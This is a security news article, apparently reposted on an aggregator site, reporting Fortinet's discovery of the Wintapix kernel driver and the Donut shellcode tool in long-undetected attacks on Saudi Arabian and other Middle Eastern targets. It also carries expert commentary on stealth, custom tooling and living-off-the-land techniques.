Undetected Attacks Against Middle East Targets Conducted Since 2020

Targeted attacks against Saudi Arabia and other Middle East nations have been detected with a tool thats been in the wild since 2020.

Businesses in the Middle East faced a series of targeted attacks over the past few years, with an open source tool used by threat actors as a kernel driver.
Researchers at Fortinet
found a sample of the so-called Donut tool while monitoring suspicious executables that were using open source tools. In particular, this open source shellcode-generation tool, along with a variant of the Wintapix driver, were discovered to have been used in targeted cyberattacks on Saudi Arabia and other Middle East nations.
Fortinet researchers Geri Revay and Hossein Jazi said in a post on their research that they believe this driver has been active in the wild since at least mid-2020, not reported until now, and used over the past few years in several campaigns.
Specifically,
Donut
produces x86 or x64 shellcode payloads from .NET Assemblies, and this shellcode can be injected into an arbitrary Windows process for an in-memory execution. In this attack, Wintapix is loaded into the kernel, where an embedded shellcode is injected into a suitable process local system privilege, and then loads and executes an encrypted .NET payload.
One sample the Fortinet researchers captured was uploaded to Virus Total in February 2023, but had been compiled in May 2020. Another variant of this driver with the same name was compiled around that time as well but was uploaded to Virus Total in September 2022.
Fortinet researchers say its unclear how the driver was distributed, and they dont they know who was behind this operation. Observed telemetry shows that while this driver has primarily targeted at Saudi Arabia, it has also been detected in Jordan, Qatar, and the United Arab Emirates, which are the classic targets of Iranian threat actors, the report said.
Iranian threat actors have been known to exploit Microsoft Exchange Servers to deploy additional malware, so it is possible that this driver has been employed alongside Exchange attacks. To that point, the compilation time of the drivers is also aligned with times when Iranian threat actors were exploiting Exchange server vulnerabilities, the researchers wrote.
At this stage, it is unclear which organizations were targeted, and what the attackers were looking for. Ciarán Walsh, associate research engineer at Tenable, says that depending on the nature of the attack and sophistication of the threat actor, it is entirely possible for a campaign to go undetected for an extended period of time like this one did.
APT1
(CommentCrew) has been noted as maintaining a presence on victim networks without detection for years during its cyberespionage campaigns, he says.
Asked if he believes the time spent undetected was indicative of the sophistication of an attacker, Walsh says an attackers sophistication is based on a myriad of factors and also depends on the objectives of a campaign.
In espionage, the aim would be to go undetected for however long it takes to achieve those objectives, he says, but in campaigns that aim to cause disruption such as
Anonymous Sudan
and its DDoS campaigns, being stealthy and maintaining a foothold in a target network is not a priority.
Walsh notes that open source tools are more likely to be detected, as the security community knows of them and countermeasures and remediation techniques have been developed to counteract them.
Custom tooling is much more difficult to detect as automated systems have little, if any, information about the tool to use as part of their detection mechanisms, he says. Attackers do sometimes adopt an approach of using tools already on target systems or within target networks.
That living-off-the-land approach was used by
Volt Typhoon
, an APT attributed to China that Microsoft last week warned had gained access to telecom networks and other critical infrastructure targets in the US.
Living-off-the-land allows for stealth as there is no execution of any suspicious programs or scripts, which would trigger an alert, Walsh says. The attackers instead use tools built into operating systems, which are less likely to trigger an alert, or even be deemed suspicious.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Undetected Attacks Against Middle East Targets Conducted Since 2020